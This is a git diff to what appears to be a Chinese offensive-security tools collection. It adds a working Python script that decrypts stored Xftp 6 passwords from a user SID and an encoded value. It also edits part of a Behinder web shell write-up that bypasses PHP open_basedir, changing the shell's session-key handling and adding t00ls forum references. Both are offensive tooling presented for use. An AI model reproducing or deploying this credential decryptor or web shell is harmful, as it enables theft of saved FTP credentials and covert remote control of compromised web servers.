diff --git a/tools/xFTP6密码解密.md b/tools/xFTP6密码解密.md
new file mode 100644
index 0000000..a87a35e
--- /dev/null
+++ b/tools/xFTP6密码解密.md
@@ -0,0 +1,17 @@
+### xFTP6密码解密
+
+```python
+from base64 import b64encode, b64decode
+from Crypto.Hash import MD5, SHA256
+from Crypto.Cipher import ARC4
+
+UserSid = "RcoIlS-1-5-21-3990929841-153547143-3340509336-1001"
+rawPass = "klSqckgTSU0TfhYxu6MB1ayrbnu3qnTOEYXUVlZe9R1zdney"
+data = b64decode(rawPass)
+Cipher = ARC4.new(SHA256.new((UserSid).encode()).digest())
+ciphertext, checksum = data[:-SHA256.digest_size], data[-SHA256.digest_size:]
+plaintext = Cipher.decrypt(ciphertext)
+print plaintext.decode()
+```
+
+上面就是解密代码,需要自行安装需要的库，使用python2运行或者修改print()在python3环境下使用.
\ No newline at end of file
diff --git a/tools/冰蝎bypass_open_basedir_shell.md b/tools/冰蝎bypass_open_basedir_shell.md
index 67fc2d3..a13e1b0 100644
--- a/tools/冰蝎bypass_open_basedir_shell.md
+++ b/tools/冰蝎bypass_open_basedir_shell.md
@@ -45,7 +45,7 @@ if (isset($_GET['pass']))
     $_SESSION['k']=$key;
     print $key;
 }
-else
+else if (!empty($_SESSION['k']))
 {
     $key=$_SESSION['k'];
         $post=file_get_contents("php://input").'';
@@ -71,6 +71,8 @@ else
 
 ```
 
-### 原帖：https://www.t00ls.net/thread-56301-1-1.html
+### 原帖：https://www.t00ls.net/thread-56301-1-1.html 
+
+### 参考：https://www.t00ls.net/thread-56337-1-1.html
 
 ### 欢迎大家前往土司投稿！
\ No newline at end of file